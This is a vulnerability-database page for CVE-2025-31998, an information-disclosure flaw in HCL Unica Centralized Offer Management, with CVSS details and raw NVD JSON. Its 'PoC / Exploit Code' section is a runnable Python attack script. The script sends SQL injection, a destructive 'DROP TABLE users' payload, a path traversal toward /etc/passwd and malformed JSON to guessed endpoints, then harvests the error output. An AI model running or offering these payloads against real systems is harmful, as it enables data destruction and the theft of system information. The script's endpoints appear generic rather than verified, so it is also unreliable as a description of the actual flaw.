Security Vulnerability Report
中文
CVE-2025-31998 CVSS 3.5 LOW

CVE-2025-31998

Published: 2025-10-12 03:15:35
Last Modified: 2025-10-29 17:20:08
Source: [email protected]

Description

HCL Unica Centralized Offer Management is vulnerable to poor unhandled exceptions which exposes sensitive information. An attacker can exploit use this information to exploit known vulnerabilities launch targeted attacks, such as remote code execution or denial of service.

CVSS Details

CVSS Score
3.5
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:hcltech:unica_centralized_offer_management:*:*:*:*:*:*:*:* - VULNERABLE
HCL Unica Centralized Offer Management(所有未修补的版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-31998 PoC - HCL Unica Centralized Offer Management Information Disclosure # This PoC demonstrates how unhandled exceptions can leak sensitive information import requests import sys TARGET_URL = "https://target-hcl-unica.com" AUTH_COOKIE = "JSESSIONID=YOUR_SESSION_ID" # Requires low-privilege authentication def trigger_exception(target_url, auth_cookie): """ Trigger unhandled exception by sending malformed requests to various endpoints to elicit verbose error messages containing sensitive information. """ headers = { "Cookie": auth_cookie, "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" } # Various payloads designed to trigger unhandled exceptions payloads = [ # Payload 1: Null pointer / invalid parameter injection f"{target_url}/Campaign/centralizedOfferManagement.do?action=view&id=NULL'%20OR%201=1--", # Payload 2: Type confusion / invalid input type f"{target_url}/Campaign/offer/listOffers.do?offerId=../../../../etc/passwd", # Payload 3: Malformed JSON to API endpoint f"{target_url}/api/v1/offers", # Payload 4: Invalid date format triggering parsing exception f"{target_url}/Campaign/centralizedOfferManagement.do?startDate=INVALID_DATE_FORMAT", # Payload 5: SQL error triggering unhandled exception f"{target_url}/Campaign/offer/search.do?query=';DROP%20TABLE%20users;--", ] for i, payload in enumerate(payloads, 1): try: if "api/v1" in payload: # Send malformed JSON for API endpoint response = requests.post( payload, headers={**headers, "Content-Type": "application/json"}, data='{"invalid": "json{{{' ) else: response = requests.get(payload, headers=headers, timeout=10) print(f"\n[+] Payload {i}: {payload}") print(f"[+] Status Code: {response.status_code}") # Check for verbose error messages (indicating unhandled exception) error_indicators = [ "stack trace", "Exception", "java.", "com.hcl", ".do", "SQL", "database", "NullPointer", "ClassCast", "NumberFormat", "FileNotFound", "/opt/", "/var/", "C:\\", "WEB-INF" ] response_text = response.text.lower() for indicator in error_indicators: if indicator.lower() in response_text: print(f"[!] SENSITIVE INFO LEAKED: '{indicator}' found in response") # Print relevant portion of response containing error details if any(ind.lower() in response_text for ind in error_indicators): print(f"\n[*] Leaked Information:\n{response.text[:2000]}") except requests.exceptions.RequestException as e: print(f"[-] Request failed for payload {i}: {e}") if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] print(f"[*] Targeting: {TARGET_URL}") print("[*] CVE-2025-31998 - HCL Unica Information Disclosure PoC") trigger_exception(TARGET_URL, AUTH_COOKIE)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-31998", "sourceIdentifier": "[email protected]", "published": "2025-10-12T03:15:34.557", "lastModified": "2025-10-29T17:20:08.280", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL Unica Centralized Offer Management is vulnerable to poor unhandled exceptions which exposes sensitive information. An attacker can exploit use this information to exploit known vulnerabilities launch targeted attacks, such as remote code execution or denial of service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-209"}, {"lang": "en", "value": "CWE-703"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:unica_centralized_offer_management:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.1.0.1", "matchCriteriaId": "5542E4D6-1B72-44F5-8CFF-D31D47444299"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124422", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.